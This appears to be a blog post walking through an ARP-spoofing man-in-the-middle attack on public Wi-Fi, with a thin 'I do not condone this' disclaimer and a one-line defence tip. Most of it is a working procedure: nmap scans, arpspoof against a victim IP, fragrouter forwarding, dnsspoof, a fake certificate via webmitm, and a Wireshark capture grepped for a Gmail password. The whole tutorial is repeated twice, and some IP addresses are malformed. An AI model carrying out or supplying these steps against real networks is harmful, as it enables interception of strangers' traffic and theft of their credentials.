ARP spoofing
Ok, so I decided, now that I have said a little about myself, and what I am dealing with, I suppose I will throw something out here actually "useful" to you guys. I do not condone this, blah blah, you get it :P Anyway, what I will be explaining here is a "man-in-the-middle" attack used commonly on wifi networks because they are open, and lots of people get on. This is just to inform you, on how this works, and what could be happening to you when your at starbucks, drinking your coffee, and checking your email, and decide to edit some banking info what can happen to you. So here is how this works. Basically, while you are getting your jollies at Yahoo and Gmail, and that junk Someone is intercepting your traffic, and reading everything that you are typing ;). Sucks right? yeah it does ;). This attack will grab specifically your gmail password, and in the mean time you can browse all the packets that are coming from the victim. . So what goes down for real here? Your browsing, someone gets between you and the router, and routes your traffic to the router, so it looks like this:
YOU_BROWSING----->Attacker------>Router.
Basically, you are really sending him your packets, and he is just routing them to the router, which then goes to the internet, etc. So what does he have to do to get this going? lets assume he is using ubuntu. Here is what he would do, this is just one out of many ways this could be done by the way.
First, and foremost, he would grab the IP of the Gateway, and you.
nmap -sS 192.168.0.1.1-100 --> scans network IP addresses for open ports, doing a TCP SYN scan Applying the different banks for the numbers will do as well, say 192.168.1.1-100.
Say your IP is 192.168.1.47 and the Gateway IP is 192.168.1.1
nmap -sT 192.168.1.1.47 --> A TCP connect scan. Displaying whats going on with your machine.
Alternatively, arp -a will work, showing your arp table, and you can see your router there.
Anyway, after he has your IP, it would be time to move on.
We will use arpspoof to redirect the network traffic to our computer.
sudo arpspoof -i wlan0 -t 192.168.1.47 192.168.1.1
where wlan0 is your wireless interface.
This will send out ARP replies to the victim saying that the gateway IP address is at out computer s MAC address. Letting us receive all traffic from the victim.
Next, open a new terminal window and enter this, make sure you let all of these commands run, and don't close the window :P
sudo fragrouter -i wlan0 -B1
Again, wlan0 is your wireless interface.
This begins the IP forwarding. So that the traffic goes through you, to the gateway, etc.
Next, dnsspoofing, in a new window naturally.
sudo dnsspoof -i wlan0
This starts a dns server on your computer which replies to all DNS requests with your computers IP address. Meaning all the URLs come through you.
Next were going to make a fake certificate, in a new window ;)
sudo webmitm
Follow the prompts, and enter in totally bogus information ;) Make it look legit though :p.
This just creates a fake certificate to pop up on the Gmail SLL login page.
Next start wireshark.
sudo wireshark
From there, click capture interfaces.
Find the line with "your" IP address in it, wlan0 for me, and click the capture button.
let it run as long as you want to load the packets from your friendly neighbour checking his gmail over there in counter #5.
So now, say that "you" are browsing the internet, and decide to log into your gmail account. You do so, only you get a certificate pop up and you click continue like you always do ;)
Now back to being the attacker.
Stop that capture, and save it as gmail-text
Now lets find the pass.
Assuming that you saved it to your home directory, and you are in that directory:
cat gmail-text | grep pass
Bam. You should have that gmail password in clear text. And if you open that wireshark log, you should be able to see any and all traffic that "you" were performing.
So say this attacker is pulling this stunt on you, while you had Yahoo messenger open, telling your friend how awesome it was that you could get away with cheating on your wife ;). Don't cheat on your wife and tell someone else!!!! Anyway, the attacker now has everything you have said. Any websites you have visited, anything ;).
So how do you avoid this? Simple. Inspect your certificates ;). If they are not from the site your visiting, or looks very funky, simply say no, and check your friggin email when you get home :P.
Hope you learned something, especially about how insecure 802.11b/g networks can be. ESPECIALLY public ones. Be careful guys.
Peace.
YOU_BROWSING----->Attacker------>Router.
Basically, you are really sending him your packets, and he is just routing them to the router, which then goes to the internet, etc. So what does he have to do to get this going? lets assume he is using ubuntu. Here is what he would do, this is just one out of many ways this could be done by the way.
First, and foremost, he would grab the IP of the Gateway, and you.
nmap -sS 192.168.0.1.1-100 --> scans network IP addresses for open ports, doing a TCP SYN scan Applying the different banks for the numbers will do as well, say 192.168.1.1-100.
Say your IP is 192.168.1.47 and the Gateway IP is 192.168.1.1
nmap -sT 192.168.1.1.47 --> A TCP connect scan. Displaying whats going on with your machine.
Alternatively, arp -a will work, showing your arp table, and you can see your router there.
Anyway, after he has your IP, it would be time to move on.
We will use arpspoof to redirect the network traffic to our computer.
sudo arpspoof -i wlan0 -t 192.168.1.47 192.168.1.1
where wlan0 is your wireless interface.
This will send out ARP replies to the victim saying that the gateway IP address is at out computer s MAC address. Letting us receive all traffic from the victim.
Next, open a new terminal window and enter this, make sure you let all of these commands run, and don't close the window :P
sudo fragrouter -i wlan0 -B1
Again, wlan0 is your wireless interface.
This begins the IP forwarding. So that the traffic goes through you, to the gateway, etc.
Next, dnsspoofing, in a new window naturally.
sudo dnsspoof -i wlan0
This starts a dns server on your computer which replies to all DNS requests with your computers IP address. Meaning all the URLs come through you.
Next were going to make a fake certificate, in a new window ;)
sudo webmitm
Follow the prompts, and enter in totally bogus information ;) Make it look legit though :p.
This just creates a fake certificate to pop up on the Gmail SLL login page.
Next start wireshark.
sudo wireshark
From there, click capture interfaces.
Find the line with "your" IP address in it, wlan0 for me, and click the capture button.
let it run as long as you want to load the packets from your friendly neighbour checking his gmail over there in counter #5.
So now, say that "you" are browsing the internet, and decide to log into your gmail account. You do so, only you get a certificate pop up and you click continue like you always do ;)
Now back to being the attacker.
Stop that capture, and save it as gmail-text
Now lets find the pass.
Assuming that you saved it to your home directory, and you are in that directory:
cat gmail-text | grep pass
Bam. You should have that gmail password in clear text. And if you open that wireshark log, you should be able to see any and all traffic that "you" were performing.
So say this attacker is pulling this stunt on you, while you had Yahoo messenger open, telling your friend how awesome it was that you could get away with cheating on your wife ;). Don't cheat on your wife and tell someone else!!!! Anyway, the attacker now has everything you have said. Any websites you have visited, anything ;).
So how do you avoid this? Simple. Inspect your certificates ;). If they are not from the site your visiting, or looks very funky, simply say no, and check your friggin email when you get home :P.
Hope you learned something, especially about how insecure 802.11b/g networks can be. ESPECIALLY public ones. Be careful guys.
Peace.
0 comments:
Post a Comment